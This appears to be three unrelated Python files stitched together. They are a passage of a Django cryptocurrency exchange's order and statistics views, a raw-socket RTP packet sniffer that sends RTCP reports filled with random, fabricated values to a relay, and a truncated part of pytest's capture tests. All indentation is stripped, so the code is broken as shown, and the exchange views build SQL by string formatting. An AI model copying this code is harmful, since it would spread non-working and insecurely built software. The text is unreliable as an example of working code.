SellSum = item.sum1 ##LTC
BuySum = item.sum1 * item.price ## UAH
Rate = item.price
AccumSellSum += SellSum
if GroupSellDict.has_key(Rate):
GroupSellDict[Rate][Currency2Title] = GroupSellDict[Rate][Currency2Title] + SellSum
GroupSellDict[Rate][Currency1Title] = GroupSellDict[Rate][Currency1Title] + BuySum
else:
GroupSellDict[Rate] = {Currency2Title: SellSum, Currency1Title: BuySum}
ResSellList = []
LL = GroupSellDict.keys()
L = []
for i in LL:
Temp = Decimal(i)
GroupSellDict[Temp] = GroupSellDict[i]
L.append(Temp)
L.sort()
Price = 0
MinPrice = 0
for i in L:
Price = format_numbers10(i)
ResSellList.append({"price": Price,
"currency_trade": format_numbers10(GroupSellDict[i][Currency2Title]),
"currency_base": format_numbers10(GroupSellDict[i][Currency1Title])})
if len(ResSellList):
MinPrice = ResSellList[0]["price"]
Dict = {"orders_sum": format_numbers10(AccumSellSum),
"list": ResSellList,
"min_price": MinPrice,
"max_price": Price}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def last_price(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
Dict = None
try:
deal = DealsMemory.objects.filter(trade_pair=Current.id).latest("id")
Dict = {"price": format_numbers4(deal.price), "price_10": format_numbers10(deal.price)}
except:
Dict = {"price": "0", "price_10": "0.000000000"}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
### TODO stat
@my_cache()
def day_stat(Req, Pair):
Current = TradePairs.objects.get(url_title=Pair)
##last value 17520
cursor = connection.cursor()
Q = cursor.execute("SELECT sum(VolumeTrade) as VolumeTrade, \
sum(VolumeBase) as VolumeBase,\
max(Max) as Max,\
min(Min) as Min \
FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 17520 " % Current.id)
List = dictfetchall(cursor, Q)
row = List[0]
for i in row:
if not row[i]:
row[i] = format_numbers4(Decimal("0"))
else:
row[i] = format_numbers4(Decimal(row[i]))
Dict = {"volume_base": row['VolumeBase'],
"volume_trade": row['VolumeTrade'],
"min": row['Min'],
"max": row['Max'],
}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def high_japan_stat(Req, Pair):
Current = TradePairs.objects.get(url_title=Pair)
# last value 17520
List = StockStat.objects.raw("SELECT * FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 17520 " % Current.id)
ListJson = []
VolumeBase = 0
VolumeTrade = 0
i = 0
for item in List:
StartDate = item.start_date
if i < 48:
VolumeTrade = VolumeTrade + item.VolumeTrade
VolumeBase = VolumeBase + item.VolumeBase
i += 1
Key = calendar.timegm(StartDate.utctimetuple())
ListJson.append([int(Key) * 1000, float(item.Start), float(item.Max), float(item.Min), float(item.End),
float(item.VolumeTrade)])
OnlineUsersCount = OnlineUsers.objects.count()
ListJson.reverse()
Dict = {"trades": ListJson,
"online": OnlineUsersCount,
"volume_base": str(VolumeBase),
"volume_trade": str(VolumeTrade)}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@my_cache()
def japan_stat(Req, Pair):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
return json_false500(Req)
List = StockStat.objects.raw("SELECT * FROM main_stockstat WHERE main_stockstat.Stock_id=%i \
ORDER BY id DESC LIMIT 48 " % Current.id)
ListJson = []
VolumeBase = 0
VolumeTrade = 0
for item in List:
StartDate = item.start_date
VolumeTrade = VolumeTrade + item.VolumeTrade
VolumeBase = VolumeBase + item.VolumeBase
Key = "%i:%i" % (StartDate.hour, StartDate.minute)
ListJson.append(
[Key, float(item.Start), float(item.Max), float(item.Min), float(item.End), float(item.VolumeTrade)])
OnlineUsersCount = OnlineUsers.objects.count()
ListJson.reverse()
Dict = {"trades": ListJson,
"online": OnlineUsersCount,
"volume_base": str(VolumeBase),
"volume_trade": str(VolumeTrade)}
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
##TODO add date filters
@my_cache(30)
def deal_list(Req, Pair):
ResList = common_deal_list(Pair)
JsonP = json.JSONEncoder().encode(ResList)
return JsonP
def common_deal_list(Pair, User_id=None):
Current = None
try:
Current = TradePairs.objects.get(url_title=Pair)
except:
        return []  # no trade pair with this url_title; Req is not available in this helper
ldeals = None
startdate = datetime.now()
# TODO adding paging for client orders
if User_id is None:
enddate = startdate - timedelta(days=30)
ldeals = DealsMemory.objects.filter(trade_pair=Current.id, pub_date__gte=enddate).order_by('-pub_date')[:200]
else:
enddate = startdate - timedelta(days=365)
ldeals = DealsMemory.objects.filter(trade_pair=Current.id, user_id=User_id, pub_date__gte=enddate ).order_by('-pub_date')[:200]
ResList = []
for item in ldeals:
new_item = {}
rate = item.price
new_item['pub_date'] = (item.pub_date - datetime(1970,1,1)).total_seconds() # formats.date_format(item.pub_date, "DATETIME_FORMAT")
new_item["type"] = item.type_deal
new_item["user"] = item.user
new_item["price"] = format_numbers10(rate)
new_item["amnt_base"] = format_numbers10(item.amnt_base)
new_item["amnt_trade"] = format_numbers10(item.amnt_trade)
ResList.append(new_item)
return ResList
@json_auth_required
def my_closed_orders(Req, Pair):
ResList = common_deal_list(Pair, Req.user)
Response = HttpResponse(json.JSONEncoder().encode(ResList))
Response['Content-Type'] = 'application/json'
return Response
@my_cache()
def client_orders(Req, User_id, Title):
Dict = {}
Current = None
try:
Current = TradePairs.objects.get(url_title=Title)
except:
return json_false500(Req)
Dict["auth"] = True
MyOrders = OrdersMem.objects.filter(user = User_id,
trade_pair = Current.id,
status='processing')
MyOrdersList = []
c = getcontext()
c.prec = settings.TRANS_PREC
for i in MyOrders:
MyOrdersDict = {}
MyOrdersDict["pub_date"] = (i.pub_date-datetime(1970,1,1)).total_seconds()
# formats.date_format(i.pub_date, "DATETIME_FORMAT")
MyOrdersDict["id"] = i.id
MyOrdersDict["sum1"] = str(i.sum1)
if i.currency1 == Current.currency_on.id:
MyOrdersDict["type"] = "sell"
MyOrdersDict["price"] = format_numbers10(i.price)
MyOrdersDict["amnt_trade"] = format_numbers10(i.sum1)
MyOrdersDict["amnt_base"] = format_numbers10(i.sum1*i.price)
else:
MyOrdersDict["type"] = "buy"
MyOrdersDict["price"] = format_numbers10(i.price)
MyOrdersDict["amnt_base"] = format_numbers10(i.sum1)
MyOrdersDict["amnt_trade"] = format_numbers10(i.sum1/i.price)
MyOrdersList.append(MyOrdersDict)
balance_sell = get_account(user_id=User_id, currency=Current.currency_on)
balance_buy = get_account(user_id=User_id, currency=Current.currency_from)
Dict["balance_buy"] = format_numbers_strong(balance_buy.get_balance)
Dict["balance_sell"] = format_numbers_strong(balance_sell.get_balance)
Dict["your_open_orders"] = MyOrdersList
RespJ = json.JSONEncoder().encode(Dict)
return RespJ
@json_auth_required
def my_orders(Req, Title):
return client_orders(Req, Req.user, Title)
|
sniffer.py
|
#packet sniffer in python
#for linux
import socket
from struct import *
from multiprocessing import Process, Lock, Pipe, Value
import random
import sched, time
ip_send_rtcp_on = '127.0.0.1'
port_send_rtcp_on = 5009
rtcp_sending_delay = 30 #in seconds
def giveRandom(givenRange=(0,5000)):
return random.randint(givenRange[0],givenRange[1])
def slice_bin_to_tuple(bin_string, indices):
bin_string_tuple = [bin_string[s:e]for s,e in indices] # creating a list of all the values in binary string
return tuple([int(e,2) for e in bin_string_tuple]) #converting all the values to int and putting them in the tuple
def parse_rtp_header(packet):
vpxccm, payload, sequence_number, timestamp, ssrc = unpack('!BBHII', packet)
#converting the first byte to different values
    vpxccm_bin = bin(vpxccm)[2:].zfill(8)  # zero-pad so the fixed bit-slice indices below stay valid
    indices = [(0,2), (2,3), (3,4), (4,7), (7,8)] #creating indices to slice the string at
version, padding, ext_bit, cc, m = slice_bin_to_tuple(vpxccm_bin, indices)
return {"version": version, "padding": padding, "ext_bit": ext_bit, "cc": cc, "m": m, "payload": payload, "sequence_number": sequence_number, "timestamp": timestamp, "ssrc": ssrc}
def sniff_rtp(conn):
#create an INET RAW socket
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
ip_header_length = 20
udp_header_length = 8
rtp_header_length = 12
print 'Socket opened to sniff UDP packets'
#receive a packet
while True:
packet, server = s.recvfrom(65536)
ip_header = unpack('!BBHHHBBH4s4s',packet[0:ip_header_length])
destination_address = socket.inet_ntoa(ip_header[9])
source_port, destination_port, udp_packet_length, checksum = unpack('!HHHH', packet[ip_header_length:ip_header_length+udp_header_length])
#print 'Source port: {}, Desination port: {}, Length: {}, Checksum: {}'.format(source_port, destination_port, udp_packet_length, checksum)
rtp_packet_length = udp_packet_length-udp_header_length
rtp_packet = packet[ip_header_length+udp_header_length:ip_header_length+udp_header_length+rtp_packet_length]
#print len(rtp_packet)
if destination_address == '192.168.2.66' and destination_port == 5004:
rtp_header = rtp_packet[0:12]
conn.send(parse_rtp_header(rtp_header))
def send_rtcp_packet(sc, sock, ssrc, frac_cum, extended, interval_gitter, last_sr, delay):
print "Doing stuff after 30 s..."
vprc = 129
rt = 201
length = 64
if delay.value == 0:
delay.value = 1
else:
delay.value = 0
    rtcp_packet = pack('!BBHIIIIIII', vprc, rt, length, int(ssrc.value), int(ssrc.value), int(frac_cum.value), int(extended.value), int(interval_gitter.value), int(last_sr.value), int(delay.value))
#send the socket to the relay
sock.sendto(rtcp_packet, (ip_send_rtcp_on, port_send_rtcp_on))
print unpack('!BBHIIIIIII', rtcp_packet)
    sc.enter(rtcp_sending_delay, 1, send_rtcp_packet, (sc, sock, ssrc, frac_cum, extended, interval_gitter, last_sr, delay))
def processRTP(conn,ssrc, frac_cum, extended, interval_gitter, last_sr, delay):
print 'Sending RTCP process opened'
#initializing the data structure
frac_cum.value = giveRandom()
extended.value = giveRandom()
interval_gitter.value = giveRandom()
last_sr.value = giveRandom()
delay.value = giveRandom(range(0,2))
while True:
rtp_header = conn.recv()
ssrc.value = rtp_header['ssrc']
#frac_cum.value = giveRandom()
#extended.value = giveRandom()
#interval_gitter.value = giveRandom()
#last_sr.value = giveRandom()
#delay.value = giveRandom(range(0,10))
#print rtp_header['ssrc']
if __name__ == '__main__':
jobs = []
parent, child = Pipe()
rtpSniffingProcess = Process(target = sniff_rtp, args=(child,))
jobs.append(rtpSniffingProcess)
lock = Lock()
ssrc = Value('d', 0.0, lock=lock)
frac_cum = Value('d', 0.0, lock=lock)
extended = Value('d', 0.0, lock=lock)
interval_gitter = Value('d', 0.0, lock=lock)
last_sr = Value('d', 0.0, lock=lock)
delay = Value('d', 0.0, lock=lock)
rtpProcessingProcess = Process(target = processRTP, args=(parent,ssrc,frac_cum, extended, interval_gitter, last_sr, delay))
jobs.append(rtpProcessingProcess)
for job in jobs:
job.start()
#create the socket to send the RTCP Receiver reports to relay
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# schedule a function that gets the data structure as the arguments
s = sched.scheduler(time.time, time.sleep)
    s.enter(rtcp_sending_delay, 1, send_rtcp_packet, (s, sock, ssrc, frac_cum, extended, interval_gitter, last_sr, delay))
s.run()
|
test_capture.py
|
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import StringIO
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
from typing import List
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.config import ExitCode
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
needsosdup = pytest.mark.skipif(
not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
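def _demo_std_capture():
    # Hedged usage sketch (not part of the original suite): the three helpers
    # above only differ in the Capture class plugged into MultiCapture.
    cap = StdCapture()
    cap.start_capturing()
    print("hello")
    out, err = cap.readouterr()  # expected: ("hello\n", "")
    cap.stop_capturing()
    return out, err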
class TestCaptureManager:
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config.argparsing import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, "dup", raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@pytest.mark.parametrize(
"method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
)
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile(
"""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
"""
)
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile) -> None:
flist = [] # type: List[TextIO]
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
bio = io.BytesIO()
f = capture.safe_text_dupfile(bio, "wb")
f.write("hello")
assert bio.getvalue() == b"hello"
assert "BytesIO object" in f.name
def test_dupfile_on_textio():
sio = StringIO()
f = capture.safe_text_dupfile(sio, "wb")
f.write("hello")
assert sio.getvalue() == "hello"
assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
